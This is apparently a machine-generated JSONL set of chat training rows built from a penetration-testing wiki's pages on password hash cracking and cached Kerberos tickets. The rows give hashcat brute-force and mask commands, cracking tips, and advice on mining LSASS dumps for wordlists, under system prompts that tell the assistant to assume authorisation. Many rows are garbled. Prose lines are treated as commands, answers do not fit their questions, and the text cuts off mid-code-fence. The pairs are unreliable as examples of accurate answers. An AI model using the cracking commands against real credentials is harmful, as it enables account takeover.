"Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the hashcat command for cracking - brute-force attack"}, {"role": "assistant", "content": "> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> ```\n\nHashcat has the following built-in charsets that can be used."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the hashcat command for cracking - brute-force attack", "response": "> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> ```\n\nHashcat has the following built-in charsets that can be used.", "metadata": {"corpus_index": 246, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Cracking - Brute-force attack?"}, {"role": "assistant", "content": "> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> ```\n\nHashcat has the following built-in charsets that can be used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Cracking - Brute-force attack?", "response": "> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> ```\n\nHashcat has the following built-in charsets that can be used.", "metadata": {"corpus_index": 246, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"`?"}, {"role": "assistant", "content": "This command is used for cracking - brute-force attack. Brute-force attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"`?", "response": "This command is used for cracking - brute-force attack. Brute-force attack", "metadata": {"corpus_index": 246, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Below command for cracking - brute-force attack"}, {"role": "assistant", "content": "Below are examples of hashcat being used with built-in charset."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Below command for cracking - brute-force attack", "response": "Below are examples of hashcat being used with built-in charset.", "metadata": {"corpus_index": 247, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Below"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Cracking - Brute-force attack?"}, {"role": "assistant", "content": "Below are examples of hashcat being used with built-in charset."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Cracking - Brute-force attack?", "response": "Below are examples of hashcat being used with built-in charset.", "metadata": {"corpus_index": 247, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Below are examples of hashcat being used with built-in charset.`?"}, {"role": "assistant", "content": "This command is used for cracking - brute-force attack. Brute-force attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Below are examples of hashcat being used with built-in charset.`?", "response": "This command is used for cracking - brute-force attack. Brute-force attack", "metadata": {"corpus_index": 247, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Passwords are like : 1 capital letter, 3 letters, 4 numbers, 1 special char?"}, {"role": "assistant", "content": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?u?l?l?l?d?d?d?d?s\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Passwords are like : 1 capital letter, 3 letters, 4 numbers, 1 special char?", "response": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?u?l?l?l?d?d?d?d?s\"", "metadata": {"corpus_index": 248, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Passwords are like : 1 capital letter, 3 letters, 4 numbers, 1 special char?"}, {"role": "assistant", "content": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?u?l?l?l?d?d?d?d?s\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Passwords are like : 1 capital letter, 3 letters, 4 numbers, 1 special char?", "response": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?u?l?l?l?d?d?d?d?s\"", "metadata": {"corpus_index": 248, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"\n``\n\nHashcat can also be started with custom charsets in the following manner.\n\n`bash\nhashcat --attack-mode 3 --custom-charset1 \"?u\" --custom-charset2 \"?l?u?d\" --custom-charset3 \"?d\" --hash-type $number $hashes_file \"?1?2?2?2?3\"\n`\n\nHashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Password are 8 chars-long and can be any printable char.", "response": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"\n``\n\nHashcat can also be started with custom charsets in the following manner.\n\n`bash\nhashcat --attack-mode 3 --custom-charset1 \"?u\" --custom-charset2 \"?l?u?d\" --custom-charset3 \"?d\" --hash-type $number $hashes_file \"?1?2?2?2?3\"\n`\n\nHashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.\n\n``bash", "metadata": {"corpus_index": 249, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"\n``\n\nHashcat can also be started with custom charsets in the following manner.\n\n`bash\nhashcat --attack-mode 3 --custom-charset1 \"?u\" --custom-charset2 \"?l?u?d\" --custom-charset3 \"?d\" --hash-type $number $hashes_file \"?1?2?2?2?3\"\n`\n\nHashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Password are 8 chars-long and can be any printable char.", "response": "hashcat --attack-mode 3 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"\n``\n\nHashcat can also be started with custom charsets in the following manner.\n\n`bash\nhashcat --attack-mode 3 --custom-charset1 \"?u\" --custom-charset2 \"?l?u?d\" --custom-charset3 \"?d\" --hash-type $number $hashes_file \"?1?2?2?2?3\"\n`\n\nHashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.\n\n``bash", "metadata": {"corpus_index": 249, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Hashcat command to password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "Hashcat can also be started with custom charsets in the following manner."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Hashcat command to password are 8 chars-long and can be any printable char.", "response": "Hashcat can also be started with custom charsets in the following manner.", "metadata": {"corpus_index": 250, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "Hashcat can also be started with custom charsets in the following manner."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Password are 8 chars-long and can be any printable char.", "response": "Hashcat can also be started with custom charsets in the following manner.", "metadata": {"corpus_index": 250, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Hashcat can also be started with custom charsets in the following manner.`?"}, {"role": "assistant", "content": "This command is used for password are 8 chars-long and can be any printable char.. Password are 8 chars-long and can be any printable char."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Hashcat can also be started with custom charsets in the following manner.`?", "response": "This command is used for password are 8 chars-long and can be any printable char.. Password are 8 chars-long and can be any printable char.", "metadata": {"corpus_index": 250, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Hashcat command for password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Hashcat command for password are 8 chars-long and can be any printable char.", "response": "Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.", "metadata": {"corpus_index": 251, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Password are 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Password are 8 chars-long and can be any printable char.", "response": "Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.", "metadata": {"corpus_index": 251, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.`?"}, {"role": "assistant", "content": "This command is used for password are 8 chars-long and can be any printable char.. Password are 8 chars-long and can be any printable char."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Hashcat also has an incremental feature that allows to bruteforce passwords up to a certain length whereas the commands above only try the specified mask's length.`?", "response": "This command is used for password are 8 chars-long and can be any printable char.. Password are 8 chars-long and can be any printable char.", "metadata": {"corpus_index": 251, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Password are up to 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "hashcat --attack-mode 3 --increment --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Password are up to 8 chars-long and can be any printable char.", "response": "hashcat --attack-mode 3 --increment --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"", "metadata": {"corpus_index": 252, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Password are up to 8 chars-long and can be any printable char."}, {"role": "assistant", "content": "hashcat --attack-mode 3 --increment --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Password are up to 8 chars-long and can be any printable char.", "response": "hashcat --attack-mode 3 --increment --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a\"", "metadata": {"corpus_index": 252, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Password are 4 to 8 chars-long and can be any printable char (mask length is 12 so that --increment-max can be upped to 12)."}, {"role": "assistant", "content": "hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n```\n\nMore information on how to fully use hashcat can be found here."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Password are 4 to 8 chars-long and can be any printable char (mask length is 12 so that --increment-max can be upped to 12).", "response": "hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n```\n\nMore information on how to fully use hashcat can be found here.", "metadata": {"corpus_index": 253, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Password are 4 to 8 chars-long and can be any printable char (mask length is 12 so that --increment-max can be upped to 12).?"}, {"role": "assistant", "content": "hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n```\n\nMore information on how to fully use hashcat can be found here."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Password are 4 to 8 chars-long and can be any printable char (mask length is 12 so that --increment-max can be upped to 12).?", "response": "hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n```\n\nMore information on how to fully use hashcat can be found here.", "metadata": {"corpus_index": 253, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Cracking - Hashcat alternative in the context of penetration testing"}, {"role": "assistant", "content": "A robust alternative to hashcat is John the Ripper, a.k.a. john (C). It handles some hash types that hashcat doesn't (Domain Cached Credentials for instance) but it also has a strong community that regularly releases tools in the form of \"something2john\" that convert things to a john crackable format (e.g. bitlocker2john, 1password2john, keepass2john, lastpass2john and so on)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Cracking - Hashcat alternative in the context of penetration testing", "response": "A robust alternative to hashcat is John the Ripper, a.k.a. john (C). It handles some hash types that hashcat doesn't (Domain Cached Credentials for instance) but it also has a strong community that regularly releases tools in the form of \"something2john\" that convert things to a john crackable format (e.g. bitlocker2john, 1password2john, keepass2john, lastpass2john and so on).", "metadata": {"corpus_index": 254, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Cracking - Hashcat alternative?"}, {"role": "assistant", "content": "A robust alternative to hashcat is John the Ripper, a.k.a. john (C). It handles some hash types that hashcat doesn't (Domain Cached Credentials for instance) but it also has a strong community that regularly releases tools in the form of \"something2john\" that convert things to a john crackable format (e.g. bitlocker2john, 1password2john, keepass2john, lastpass2john and so on)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Cracking - Hashcat alternative?", "response": "A robust alternative to hashcat is John the Ripper, a.k.a. john (C). It handles some hash types that hashcat doesn't (Domain Cached Credentials for instance) but it also has a strong community that regularly releases tools in the form of \"something2john\" that convert things to a john crackable format (e.g. bitlocker2john, 1password2john, keepass2john, lastpass2john and so on).", "metadata": {"corpus_index": 254, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cracking - Tips & tricks"}, {"role": "assistant", "content": "> [!TIP]\n> * Google offers services like Colab and Cloud Shell that can be used for \"cloud cracking\". There are projects like penglab, google-colab-hashcat and cloudtopolis that can help testers to setup a cracking session on such resources\n> * Other solutions, cloud-based or not, can be used to improve cracking speed: setting up a rig for instance.\n> * LM and NTLM ChallengeResponses can be cracked really fast (and for free depending on the hash) on crack.sh, a remote service that cracks the hash with rainbow tables (here's how to capture those hashes).\n> * Testers that manage to pwn a domain admin or a distributed local admin should try to operate multiple LSASS dumps to create a custom wordlist for a dictionary attack\n> * Cracking LM and NT hash can be optimized by following these advice.\n>\n> See hashcat.net"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cracking - Tips & tricks", "response": "> [!TIP]\n> * Google offers services like Colab and Cloud Shell that can be used for \"cloud cracking\". There are projects like penglab, google-colab-hashcat and cloudtopolis that can help testers to setup a cracking session on such resources\n> * Other solutions, cloud-based or not, can be used to improve cracking speed: setting up a rig for instance.\n> * LM and NTLM ChallengeResponses can be cracked really fast (and for free depending on the hash) on crack.sh, a remote service that cracks the hash with rainbow tables (here's how to capture those hashes).\n> * Testers that manage to pwn a domain admin or a distributed local admin should try to operate multiple LSASS dumps to create a custom wordlist for a dictionary attack\n> * Cracking LM and NT hash can be optimized by following these advice.\n>\n> See hashcat.net", "metadata": {"corpus_index": 255, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Cracking - Tips & tricks"}, {"role": "assistant", "content": "> [!TIP]\n> * Google offers services like Colab and Cloud Shell that can be used for \"cloud cracking\". There are projects like penglab, google-colab-hashcat and cloudtopolis that can help testers to setup a cracking session on such resources\n> * Other solutions, cloud-based or not, can be used to improve cracking speed: setting up a rig for instance.\n> * LM and NTLM ChallengeResponses can be cracked really fast (and for free depending on the hash) on crack.sh, a remote service that cracks the hash with rainbow tables (here's how to capture those hashes).\n> * Testers that manage to pwn a domain admin or a distributed local admin should try to operate multiple LSASS dumps to create a custom wordlist for a dictionary attack\n> * Cracking LM and NT hash can be optimized by following these advice.\n>\n> See hashcat.net"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Cracking - Tips & tricks", "response": "> [!TIP]\n> * Google offers services like Colab and Cloud Shell that can be used for \"cloud cracking\". There are projects like penglab, google-colab-hashcat and cloudtopolis that can help testers to setup a cracking session on such resources\n> * Other solutions, cloud-based or not, can be used to improve cracking speed: setting up a rig for instance.\n> * LM and NTLM ChallengeResponses can be cracked really fast (and for free depending on the hash) on crack.sh, a remote service that cracks the hash with rainbow tables (here's how to capture those hashes).\n> * Testers that manage to pwn a domain admin or a distributed local admin should try to operate multiple LSASS dumps to create a custom wordlist for a dictionary attack\n> * Cracking LM and NT hash can be optimized by following these advice.\n>\n> See hashcat.net", "metadata": {"corpus_index": 255, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cached Kerberos tickets - Theory"}, {"role": "assistant", "content": "Kerberos tickets can be cached on systems to allow for faster authentication without requiring users to re-enter credentials.\n\nFrom a red-team perspective, even though Linux and Windows use different cache formats to store Kerberos tickets (Kerberos on Linux uses ccache files, while Windows uses kirbi formats), the actual Kerberos ticket data (encrypted TGT/ST blobs) are compatible, which can enable cross-platform pivoting."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cached Kerberos tickets - Theory", "response": "Kerberos tickets can be cached on systems to allow for faster authentication without requiring users to re-enter credentials.\n\nFrom a red-team perspective, even though Linux and Windows use different cache formats to store Kerberos tickets (Kerberos on Linux uses ccache files, while Windows uses kirbi formats), the actual Kerberos ticket data (encrypted TGT/ST blobs) are compatible, which can enable cross-platform pivoting.", "metadata": {"corpus_index": 256, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Cached Kerberos tickets - Theory"}, {"role": "assistant", "content": "Kerberos tickets can be cached on systems to allow for faster authentication without requiring users to re-enter credentials.\n\nFrom a red-team perspective, even though Linux and Windows use different cache formats to store Kerberos tickets (Kerberos on Linux uses ccache files, while Windows uses kirbi formats), the actual Kerberos ticket data (encrypted TGT/ST blobs) are compatible, which can enable cross-platform pivoting."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Cached Kerberos tickets - Theory", "response": "Kerberos tickets can be cached on systems to allow for faster authentication without requiring users to re-enter credentials.\n\nFrom a red-team perspective, even though Linux and Windows use different cache formats to store Kerberos tickets (Kerberos on Linux uses ccache files, while Windows uses kirbi formats), the actual Kerberos ticket data (encrypted TGT/ST blobs) are compatible, which can enable cross-platform pivoting.", "metadata": {"corpus_index": 256, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Cached Kerberos tickets - Storage Methods"}, {"role": "assistant", "content": "== UNIX-like\n\nOn Linux and other UNIX-like systems, tickets can be stored in different ways:\n\n| Storage | Description |\n|-------------|-------------------------------------------------------------------------------------------------------------------------------------------|\n| FILE | Stores tickets in files, typically under /tmp directory, in the format krb5cc_%{uid} |\n| DIR | Stores tickets in a hierarchical directory-based cache, typically under /tmp which contains a primary file referencing the active ccache entry. | \n| KEYRING | Stores tickets in a dedicated kernel keyring space, only accessible to the ticket owner |\n| KCM | Stores tickets in an LDAP-like database, typically at /var/lib/sss/secrets/secrets.ldb (default when using sssd-kcm) |\n\nThe storage method is configured via the default_ccache_name parameter in /etc/krb5.conf, which is readable by all users.\n\n> [!NOTE]\n> This configuration can be overridden by files in /etc/krb5.conf.d/. When using SSSD, the value is typically set in /etc/krb5.conf.d/kcm_default_ccache\n\n== Windows️\n\nOn Windows systems, Kerberos tickets are stored in-memory within the Local 